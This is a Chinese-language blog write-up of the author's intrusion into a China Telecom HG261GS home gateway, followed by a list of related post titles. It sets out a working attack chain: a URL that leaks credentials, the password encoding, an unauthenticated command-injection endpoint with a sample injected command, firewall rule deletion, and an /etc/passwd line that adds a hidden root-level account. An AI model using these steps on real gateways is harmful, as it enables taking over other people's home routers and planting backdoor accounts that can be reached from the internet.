一次对天翼安全网关的渗透
起因
听大师傅说天翼安全网关可以telnet登录,回去尝试了一下发现并没有开放telnet端口,把目标转向如何开启,经过一系列搜索,最后拿下网关
信息泄露
我家这个网关型号是HG261GS,经过一番搜索,发现访问http://192.168.1.1/cgi-bin/baseinfoSet.cgi可以拿到密码
然后搜索密码的加密方式,得到工程账号的密码,加密算法为加密算法: 字母转换为其ASCII码+4,数字直接就是ASCII码。
之后登陆
命令执行
在后台转了一圈没发现开启telnet的地方,经过一番搜索,找到这个版本存在命令执行的问题,访问http://192.168.1.1/cgi-bin/telnet.cgi通过InputCmd参数可以直接执行系统命令,然后访问http://192.168.1.1./cgi-bin/telnet_output.log可以看到执行结果,通过js下的telnet.js也可以访问http://192.168.1.1/cgi-bin/submit.cgi得到执行结果
测试一下效果
结果
这样就找到了一个rce点,开始的想法是反弹shell,后来发现大部分命令都没有,是个BusyBox,打算用awk弹个shell,又碰见编码问题,试了很多种方法写不出来,这里就想着直接老老实实开启telnet登录,搜索了一波怎么进入系统
1.硬件牛盖子一拆就能长驱直入了,我也想,但是实力不允许
2.首先先导出原配置文件,在管理-设备管理,插个U盘,备份配置即可
这里导出配置感觉不太合适,万一弄坏了其他人都上不了网了,拆盖子又不会,那么只能继续搜索,转换下思路,既然有配置文件,那么肯定有读取配置文件去开启的功能,直接find搜索所有cgi文件InputCmd=find%20/%20-name%20"*cgi*",找到一个名叫telnetenable.cgi的文件,这不就是开启telnetenable.cgi的文件,这不就是开启telnet的东西嘛
直接读取内容,找到开启方法
if [ "$TELNETENABLE" == "1" ]; thenif [ "$NSM_TELNET_ENABLE" == "0" ]; thentelnetd -p 23 >/dev/null 2>&1fi
elseif [ "$NSM_TELNET_ENABLE" == "0" ]; thenkillall telnetd >/dev/null 2>&1fi
fi
发现还是不能连接,经过排查,网关开启了防火墙过滤,阻止了23端口的连接,这里找到对应的iptables链和规则行号,直接删除,比如要删除INPUT链的第三条规则,可以执行 iptables -D INPUT 3, 然后添加23端口允许通过,效果如下
添加用户
成功进入登录页面,尝试使用读到的工程账户密码和光猫背面默认密码登录,然而都登不上去。
这里直接添加一个Linux用户test/password@123
echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd
登录成功~
最后记得关掉telnet,光猫作为出口,会有个公网地址,开启后公网也可以远程登录进来关闭命令
killall telnetd >/dev/null 2>&1
一次对天翼安全网关的渗透相关推荐
- 当AI渗透到财务管理 未来人机协作机器人有望“独当一面”
在人工智能(AI).区块链(Block Chain).云计算(Cloud).大数据(Digital)四大科技技术场景纷纷落地之时,AI技术无疑成为国内大型企业降低成本最有效的手段,也成为应用最广泛的场 ...
- 天翼云从业认证(4.7)天翼云安全基础实践
了解天翼云安全总体解决方案.天翼云安全服务,以及天翼云等保合规解决方案: 天翼云安全理念 架构 (1)基础设施安全:计算.网络.存储 (2)运维审计与风险控制服务:堡垒机 (3)入侵防御:防火墙+安 ...
- 天翼云认证--大纲介绍
链接地址:https://edu.ctyun.cn/certify/list 如果是已经工作了,可以选择[天翼云认证从业者] 注册天翼云用户之后,可以查看.课程的目录如下 报名课程之后,就可以愉快 ...
- 天翼云主攻“5G+云+AI”,新生态革命的冲锋
天翼云不断增长,背后的逻辑是什么? 成都市区的交通路桥上,一辆巡检车正在作业. 巡检车上的摄像头通过拍摄路面,实时检测沉陷.积水.坑槽.裂缝.破损.网裂.拥包等道路问题.整个流程利用了视频4K传输.5 ...
- 天翼云混合云容灾技术解析
信息化时代,数字技术已经深度渗透到企业经营管理的方方面面,数据也成为企业的宝贵资产.如果企业遇到突发事件造成服务中断或数据丢失,将在很大程度上影响企业的正常运转,甚至影响到社会的正常运行,因此,容灾成 ...
- 安全网关设备有哪些 安全网关产品介绍
RG-WALL 1600 VPN安全网关 RG-WALL 1600下一代VPN安全网关集成了VPN.防火墙.入侵防御和流量控制技术的软硬件一体化专用安全设备,将高度安全机制.智能联动应用系统.高稳定可 ...
- 天玥运维安全网关_中国工业网络安全厂商综合能力概览
能力概览图从三个维度确定了厂商所属位置.第一个维度是安全资质,决定其上下位置:第二个维度是产品种类,决定其左右位置:这样就基本确定其所在位置,但也有多厂商的资质和产品种类差不多,我们就从第三个维度:企 ...
- Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
Penetration_Testing_POC 搜集有关渗透测试中用到的POC.脚本.工具.文章等姿势分享,作为笔记吧,欢迎补充. Penetration_Testing_POC 请善用搜索[Ctrl ...
- 中国电信天翼开放平台全面释放开放合作
5月13日,中国电信召开以"新经济•新市场•新机遇"为主题的开放合作大会.中国电信董事长王晓初表示,推动混合所有制发展,是今年电信行业改革的重点.中国电信将开展与民营资本和其他资源 ...
- 2022-10-15(Linux应急响应、配置漏洞之DNS域传送、内网渗透之内网主机发现技巧)
http://noahblog.360.cn/advanced-windows-taskscheduler-playbook/@[toc] [重要]拜读的文章链接都在标题上. 一.linux应急响应 ...
最新文章
- freecodecamp_常见技术支持问题– freeCodeCamp常见问题解答
- python和前端之HTML的激情
- Map、Set、List简介
- 懒人小工具1:winform自动生成Model,Insert,Select,Delete以及导出Excel的方法
- 老司机做VR视频,需要什么样的全景相机?
- python计算小数点后有几位_python的数字类型
- python中concat的用法_python pandas concat用法及代码示例
- python分布式编程_python分布式爬虫中的rules有什么用
- python定时器及数据库操作
- kafkaStream执行过程中出现TimeoutException异常退出
- 天锐绿盾屏幕监控,违规操作全记录
- Photoshop教程一:精细选择工具
- jQuery 中console.log什么意思
- 我们到底该转行Web全栈工程师吗?
- 我的世界服务器等级系统,[娱乐][角色][聊天][上古之石]LevelSignPlus——服务器等级声望系统[1.7.2-1.10.2]...
- 【评测】义翘神州CHO细胞无血清培养基
- 年轻人的第一次破产,从二次元开始
- 天天学JAVA-JAVA基础(2)
- 工作流任务调度系统--DolphinSchedule-1.3.6 window 安装配置
- kindle 资源汇总